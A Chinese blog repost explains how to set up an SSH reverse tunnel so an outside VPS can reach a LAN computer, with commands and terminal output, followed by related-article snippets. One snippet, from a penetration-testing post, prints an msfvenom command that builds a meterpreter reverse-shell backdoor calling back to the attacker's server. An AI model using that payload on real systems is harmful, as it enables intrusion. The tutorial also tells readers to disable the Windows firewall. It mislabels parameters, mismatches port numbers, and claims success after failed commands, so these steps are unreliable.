ssh 反向代理 外网访问内网

最新推荐文章于 2024-06-09 08:00:00 发布
最新推荐文章于 2024-06-09 08:00:00 发布
阅读量4.5k 收藏
点赞数
分类专栏: LINUX开发 协议分析

转:http://blog.sina.com.cn/s/blog_83dc494d0102vph3.html


先明确一下概念
      外网是有固定ip的机器,ssh可以之间连接上;
      内网是类似公司局域网之类,有独立ip但是不能ssh,需要管理员做端口转发等等权限性操作才可以。

文中用内网表示需要被访问的局域网内电脑,用外网表示局域网外电脑。

# 一、首先,查看外网现有的ssh端口开放情况。
[zhipeng@zhangzhipeng2023.cn ~]$ sudo netstat -anopl | grep ssh
[sudo] password for zhipeng:
tcp            0         0 0.0.0.0:22                     0.0.0.0:*                      LISTEN         22645/sshd                off (0.00/0/0)

-------------------------------------------------------------------

内网ssh连接外网:
ssh -C -R ( vpsPort  ):( vpsHostname  ): ( mySSHPort  )-p( vpsSSHPort  ) ( vpsUser  )@( vpsIP 
参数说明: 
-C 数据压缩;
-R vpsPort 要绑定的外网端口;
vpsHostname 给外网设置主机名;
mySSHPort 内网ssh服务的端口。
-p vpsSSHPort 外网ssh服务端口
vpsUser 外网用户名
vpsIP 外网用户名

neiwang@ZHIPENG-PC ~ $  ssh -C -R 3345:localhost:22 -p 22 zhipeng@VPSIP

Last login: Tue Jun   9 13:12:51 2015 from  NeiWangIP
Welcome to WaiWang Compute Service!
# OK,成功登陆到外网服务器上

# 二、现在再查看一下外网的SSH端口状态
可以看到,外网已经在监听3344端口,并且和内网电脑建立了ssh连接
[zhipeng@zhangzhipeng2023.cn ~]$ sudo netstat -anopl | grep ssh
[sudo] password for zhipeng:
tcp        0      127.0.0.1:3345          0.0.0.0:*               LISTEN      22799/sshd: zhipeng  off (0.00/0/0)
tcp            0         0 0.0.0.0:22                     0.0.0.0:*                      LISTEN         22645/sshd                off (0.00/0/0)
tcp        0     36 VPSIP:22       NeiWangIP:11694      ESTABLISHED 22796/sshd: zhipeng  on (0.38/0/0)


# 三、 接着,试一下从外网ssh内网
$ssh -C  -N -D( vpsPort  ) -p( mySSHPort  ) ( myHostname  )@( vpsHostname 
参数我就不解释了,看名字和第一步对比就知道了 myName是内网用户名
我这里加-f -N 是会报错的,如下:
[zhipeng@zhangzhipeng2023.cn ~]$ ssh -C  -f -N -D 3345 -p 3345 neiwang@localhost
The authenticity of host '[localhost]:3345 ([127.0.0.1]:3345)' can't be established.
ECDSA key fingerprint is 93:e8:a5:fa:1a:3e:0e:19:6e:c3:28:af:f7:9d:15:3c.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[localhost]:3345' (ECDSA) to the list of known hosts.
neiwang@localhost's password:
bind: Cannot assign requested address
channel_setup_fwd_listener: cannot listen to port: 3345
Could not request local forwarding.

[zhipeng@zhangzhipeng2023.cn ~]$ sudo ssh -C -D 3345 -p 3345 neiwang@localhost
neiwang@localhost's password: #输入内网密码
bind: Cannot assign requested address
channel_setup_fwd_listener: cannot listen to port: 3345
Could not request local forwarding.
Last login: Tue Jun   9 13:18:53 2015 from 127.0.0.1

[2015-06-09 13:21.51]   ~
[neiwang.neiwang-PC] 0bB logout
Connection to localhost closed.

ssh反向代理大功告成。

题外话,也不能全算题外话,很重要的
0、安全问题,慎用。
1、别忘了打开内网的sshd服务
2、外网iptables记得打开端口(防火墙)
3、如果内网电脑是windows,记得关闭防火墙,或者设置好端口访问,不然ssh 22端口会访问异常无法连接。

双刃剑客
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
服务器能ping通,但是ssh,http无法连接
chengsea0926的博客
10-10 2219
宕机分析报告 描述 服务器宕机, 网络能ping通,但是ssh,http无法连接. 宕机时间从8:57:32到9:54:34 CentOS 5.4 x64 2014-9-26 8:57:32 问题出现之前的操作 对服务器操作系统进行了更新 ( CentOS 5.10 Fina...
使用反向ssh外网访问内网主机的方法详解
09-15
标题中提到的“使用反向SSH外网访问内网主机的方法详解”是一种解决内网主机对外不可见问题的技术手段,适用于没有权限设置端口映射或不具备内网主机外网IP的情况。这种方法主要通过建立反向SSH隧道,使得外网主机...
SSH隧道技术-实现内网不可访问的服务器与外网互访
Mugo_Moon的博客
09-17 961
对于需要通过跳板机访问内网)且不存在开放端口的服务器(host-inaccessible),此类服务器无法使用Pycharm进行远程开发调试及Tensorboard实时可视化。本文介绍通过SSH隧道技术实现端口的多次转发,从而使host-inaccessible可与外网互访。 一、前提条件 拥有等同root权限(yzgpu)的目标服务器host-inaccessible 拥有等同root权...
内网渗透(一)反向代理实现外网访问内网
m0_63699746的博客
08-02 1228
msfvenom -p windows/meterpreter/reverser_tcp LHOST=你的云服务器ip LPORT=3333(端口自定) -f exe > msf.exe ,生成的后门放到a虚拟机中。总结:首先攻击端(服务器)攻击具有内网外网的虚拟机,取得权限,然后进行对另一台在同一内网的虚拟机进行渗透,通过开启隧道(也就是建立节点),让宿主机连接作为跳板的攻击机,来实现访问另一台内网上的虚拟机。攻击机(服务器)使用msf生成后门,放到a虚拟机中,点开与运行上线。
SSH反向代理
最新发布
Linux技术宅
06-09 519
SSH反向代理的实现需要一台有公网IP的主机作为代理服务器,客户端通过SSH连接到这台服务器上,然后通过服务器的端口转发功能将请求转发给内部网络中的目标主机。具体的操作方式可以通过在客户端执行SSH命令,指定代理服务器的IP地址和端口号,以及目标主机的IP地址和端口号来实现。在这种方式中,客户端通过SSH连接到一台具有公网IP的主机,然后这台主机再将请求转发给内部网络中的目标主机。总之,SSH反向代理是一种安全、方便的远程访问方式,可以帮助用户实现远程登录、文件传输等功能,同时提高网络的安全性和可访问性。
通过ssh反向代理解决服务器没网的问题
zkkksssss的博客
03-19 2703
通过ssh反向代理解决服务器没网的问题。利用ssh反向代理,命令是ssh -R,让服务器发出的请求通过ssh反向代理转发到本地的socket5服务器上去,如此服务器即可联网。
使用ssh代理映射IP到本地http访问
weixin_33862514的博客
01-19 687
今天在访问微软云的服务器的yarn的时候,虽然yarn的主页可以打开,但是看每个log无法打开页面,原因是直接调用node的主机名+端口,网络不通,无法访问。解决办法:启动ssh通道做代理:ssh命令,可能有端口,-p 22,-L指定本地代理和端口:映射真实服务器+端口 -Nssh root@139.219.***.166 -L 127.0.0.1:99...
关于远程办公ssh 反向通道的一些问题
01-07
首先呢前提条件是你得有一台能够外网访问的固定ip远程服务器,你本地所启动的项目是不能够提供外网访问的,所以呢我们需要一个中间人来告诉别人如何访问你的本地项目 这个中间人就是这台远程服务器。 既然我们是可以...
wyc网云穿内网穿透.zip
11-18
然而,NAT也使得外网无法直接访问内网中的设备。 - **端口映射**:为解决这个问题,内网穿透工具如“wyc网云穿”会在公网和内网之间建立端口映射。通过将公网的某个端口映射到内网设备的特定端口,外网请求可以定向...
frp内网穿透客户端服务
11-20
frp基于反向代理的概念,分为客户端(Client)和服务器端(Server)。客户端部署在内网环境中,而服务器端部署在有公网IP的服务器上。当内网中的服务想要被外界访问时,客户端会与服务器端建立连接,将请求转发至...
Windows下frp实现内网穿透 frp_0.38.0_windows_amd64_386.rar
01-11
总之,`frp`是Windows环境下实现内网穿透的一个强大工具,通过它,用户可以在家中或办公室轻松地让外部世界访问内网中的设备和服务,无需复杂的网络配置或昂贵的公网IP。只需正确配置和启动`frps`和`frpc`,即可轻松...
ssh可以连接但sftp不可以连接解决方案
qq_40099350的博客
05-21 2157
ssh可以连接但sftp不可以连接解决方案 如图:vim /etc/ssh/sshd_config,进行以下修改操作 然后重启sshd服务
Mac 终端/Iterm通过跳板机转发端口
benrciv的博客
04-01 2135
MacBook P~r~o上,Iterm通过跳板访问其他服务 背景: 本机访问跳板机( 需要通过 跳板机端口) # 在本地时 ssh -p 跳板端口 root@跳板IP 只有在跳板机上才能访问目的地的某服务,比如是 目的地IP:目的地端口的服务,而本地不能直接访问访问该服务,而Mac没有Windows里那种软件可以直接配置跳转,所以需要一条命令。 假如通过本地10086端口, Iterm上敲的命令如下 ssh -p 跳板机端口 root@跳板机IP -L 127.0.0.1:10086:目的IP:目的端
wampserver 的Apache启动错误提示:The requested URL / was not found on this server
热门推荐
Ramble Over The Cloud~
12-11 8万+
http://www.wanysys.cc/coding/php/800.html 今天在做本地PHP项目的时候,想把之前wampserver的本地虚拟服务器环境访问方式改为本地localhost访问方式,打开wampserver的Apache中的http://localhost/显示如下错误,提示The requested URL / was not found on this ser
channel_setup_fwd_listener_tcpip: cannot listen to port: 8888
qq_41596063的博客
10-29 3940
本地连接服务器上的jupyter lab 结果电脑突然死机,重新开机后再次连接结果报错,错误提示如下图: 不是很清楚具体原因是什么,以及如何继续使用8888端口?或许是端口号被占用之类? 为了能够继续使用,我尝试将端口号改掉,改成“7777”,或者其他不冲突的都行,然后分别在服务器和本地上更改就可以正常运行了~~ 服务器改为:jupyter lab --no-brows --port=7777 本地改为: ssh -N -f -L localhost:7777:localhost:7777 userName
内网穿透简介
weixin_42796403的博客
03-26 469
内网穿透 在本地开发的接口, 只能在局域网使用,公网服务器无法 直接读到这个接口, 只有让接口有公网地址才行. 在测试阶段可以使用工具实现内网穿透来解决这个问题. 内网穿透的作用 通常个人电脑无论是连接WIFI上网还是用网线上网,都是属于局域网里边的,外网无法直接访问到你的电脑,内网穿透可以让你的局域网中的电脑实现被外网访问功能。 现有工具 目前国内网穿透工具很多,常见的比如花生壳、Ngrok、网云穿等。 官网: 花生壳:https://hsk.oray.com Ngrok: http://www.ng
在windows中安装OpenSSH,无密码登录,永远不断线
weixin_30408739的博客
09-08 1656
到这里下载最新安装包:https://github.com/PowerShell/Win32-OpenSSH/releases下载下来解压,然后用管理员打开服务器自带的PowerShell,运行下列命令:cd C:\OpenSSH-Win64\OpenSSH-Win64Set-ExecutionPolicy unrestricted.\install-sshd.ps1.\ssh-keygen.ex...
SSH Port forwarding HOWTO 第二篇,这是转载
weixin_30535565的博客
11-27 191
From:http://manas.tungare.name/blog/ssh-port-forwarding-on-mac-os-x/ After spending about an hour configuring what should, in theory, be a simple matter, I figured I’d write a blog post that might o...
Supervisor安装及进程监控配置介绍:
weixin_34247155的博客
09-06 75
Supervisor基于Python开发,用于对Unix-like系统进行监控、管理。一、Supervisor安装步骤:1、确认系统Python版本高于2.4:[root@localhost~]#python-VPython2.7.5[root@localhost~]#yuminstallpython-meld3#安装依赖程序2、supervisor可以通...
写一个sh脚本实现ssh反向代理
04-27
好的,以下是一个简单的sh脚本实现ssh反向代理: ``` #!/bin/bash # 设置本地监听端口和远程服务器IP及端口 LOCAL_PORT=8080 REMOTE_SERVER_IP=xxx.xxx.xxx.xxx REMOTE_SERVER_PORT=22 # 启动ssh反向代理 ssh -N -R ${REMOTE_SERVER_PORT}:localhost:${LOCAL_PORT} ${REMOTE_SERVER_IP} ``` 在上面的脚本中,我们首先定义了本地监听的端口号和远程服务器的IP地址和端口号。然后我们使用ssh命令启动一个反向代理连接,将远程服务器的${REMOTE_SERVER_PORT}端口映射到本地的${LOCAL_PORT}端口。 这样,当有人连接到远程服务器的${REMOTE_SERVER_PORT}端口时,实际上会被转发到本地的${LOCAL_PORT}端口。这种技术可以用于实现远程访问本地服务、穿透防火墙等场景。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值